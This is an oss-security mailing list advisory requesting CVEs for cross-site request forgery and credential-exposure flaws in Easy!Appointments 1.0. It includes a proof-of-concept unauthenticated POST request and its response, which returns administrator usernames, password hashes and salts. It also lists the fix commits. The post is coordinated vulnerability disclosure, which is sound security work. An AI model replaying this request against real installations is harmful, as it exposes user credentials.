Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20150727131421.GA20274@lakka.kapsi.fi>
Date: Mon, 27 Jul 2015 16:14:21 +0300
From: Henri Salo <henri@...v.fi>
To: oss-security@...ts.openwall.com
Cc: cve-assign@...re.org, Alex Tselegidis <alextselegidis@...il.com>
Subject: CVE request: Easy!Appointments 1.0 Cross-Site Request Forgery and
 Insufficiently Protected Credentials vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Product: Easy!Appointments Open Source Appointment Scheduler
Product URL: http://easyappointments.org/
Vendor: Alex Tselegidis
Vulnerability Type:
    Cross-Site Request Forgery (CWE-352)
    Insufficiently Protected Credentials (CWE-522)
Vulnerable Versions: 1.0
Fixed Version: next release
Vendor Notification: 2015-04-03
Solution Status: Fixed by vendor
Solution Date: 2015-05-28
Public Disclosure: 2015-07-27

Vulnerability Details:

The web application does not sufficiently verify whether a well-formed, valid,
consistent request was intentionally provided by the user who submitted the
request. The application transmits all user credentials to unauthenticated user
and possibly allows other unauthorized actions.

Proof-of-concept without authentication:

"""
POST /ea/backend_api/ajax_filter_admins HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0
Iceweasel/31.6.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://example.com/ea/backend/users
Content-Length: 4
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

key=
"""

Returns:

"""
HTTP/1.1 200 OK
Date: Thu, 09 Apr 2015 10:28:38 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.4.39-0+deb7u2
Set-Cookie: ci_session=*removed*; expires=Thu, 09-Apr-2015 12:28:38 GMT; path=/
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 539

[{"id":"84","first_name":"Henri","last_name":"Salo","email":"email@...mple.com","mobile_number":null,"phone_number":"04012345678","address":null,"city":null,"state":null,"zip_code":null,"notes":null,"id_roles":"1","settings":{"username":"henri","password":"1f40f9a5d17bedf197274fcc1886ef6ef4015b0f883513782d6fa437f8ab9af7","salt":"547ca602bda6a2a97ff4222fb71d61c75436da1ebf86a41c33219d11f1f4568e","working_plan":null,"notifications":"0","google_sync":"0","google_token":null,"google_calendar":null,"sync_past_days":"5","sync_future_days":"5"}}]
"""

Fixed in following commit:                                                                                                                                                                                                                                                      
    https://github.com/alextselegidis/easyappointments/commit/1f73e7fcbc2c06505178200567ac905ae8570326

Related commits to add CSRF protection:
    https://github.com/alextselegidis/easyappointments/commit/f223ffa343ad91d046b4469248f6479edf1718d7
    https://github.com/alextselegidis/easyappointments/commit/daf4865c290c58b66f73507a0ae1ec41987ad840
    https://github.com/alextselegidis/easyappointments/commit/d88c138d2dd35820e355f0d7f3b93db3cc5473e8
    https://github.com/alextselegidis/easyappointments/commit/ad8c9b6522c560ac5b6309f62f8b3e2319483d54
    https://github.com/alextselegidis/easyappointments/commit/ecbe5600df03ac970e4e743215d3b3be6e1e6860

References:
    https://scapsync.com/cwe/CWE-352
    https://scapsync.com/cwe/CWE-522
    https://cwe.mitre.org/data/definitions/352.html
    https://cwe.mitre.org/data/definitions/522.html
    https://en.wikipedia.org/wiki/Cross-site_request_forgery
    https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
    https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet

- -- 
Henri Salo
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBAgAGBQJVti6tAAoJECet96ROqnV0mlwP/R82KPUH15elyTfqeImCsc/6
FpUiZrvQPvW2saPlweec6vLsdr361dZb3wfSLpltyDK/b/XFhRxGOqufjETDfsrr
tP5y7OqvpzKisu+itOpsFBiFppuLD3UCK2GsWyFM0JHrcSkOyG5dKQ1LGkQzZObD
vG2U6ofB7PRoW0C9iorlUVa7InUt9sEWojwjsONtacbibiLD4jIqui1YUs0Dg9yj
QUTBKd8RcSUddkZYzhKIkhBYgdaMdSO1ObE1taLZlK2lfQCI9L5pAXAf4k8YRP5X
N+wiX6LfmVcb+8Os0iJpsFZLT9oe0B3Kl1elm51MWFyA00P5M7B8x3svkeH34LUH
OBDyE92+LH352zn9nDIpZFeEwoEZTEZak5zAKM0L1i+qXU9LRwwZXahFvY4VyZng
mvqf4tZEogJV55q27HaWr1595b7MEHBexiNQmFrC5k9l2fFzVZRnlaIHLYjGvwpf
vSFHG8u/YpSmOOM3FM/yRZlgR21jM2cdYIDs5vpQkGfjdSW61CdQwp6m/j1znkqH
jjxYiqIhp9me4xEWmAhgm26HkQcpCHlEBwA2N2x9RvnS/Lw6oPHln8dxhu4OP3mr
Eq43X2Zz8kQJkZuQnufAzmtMYxvKmzhfVYWREBzhohox+nXImqlAvYxzCQzBEGBE
++lf9BJDbx+CMendxx9Z
=cYYp
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.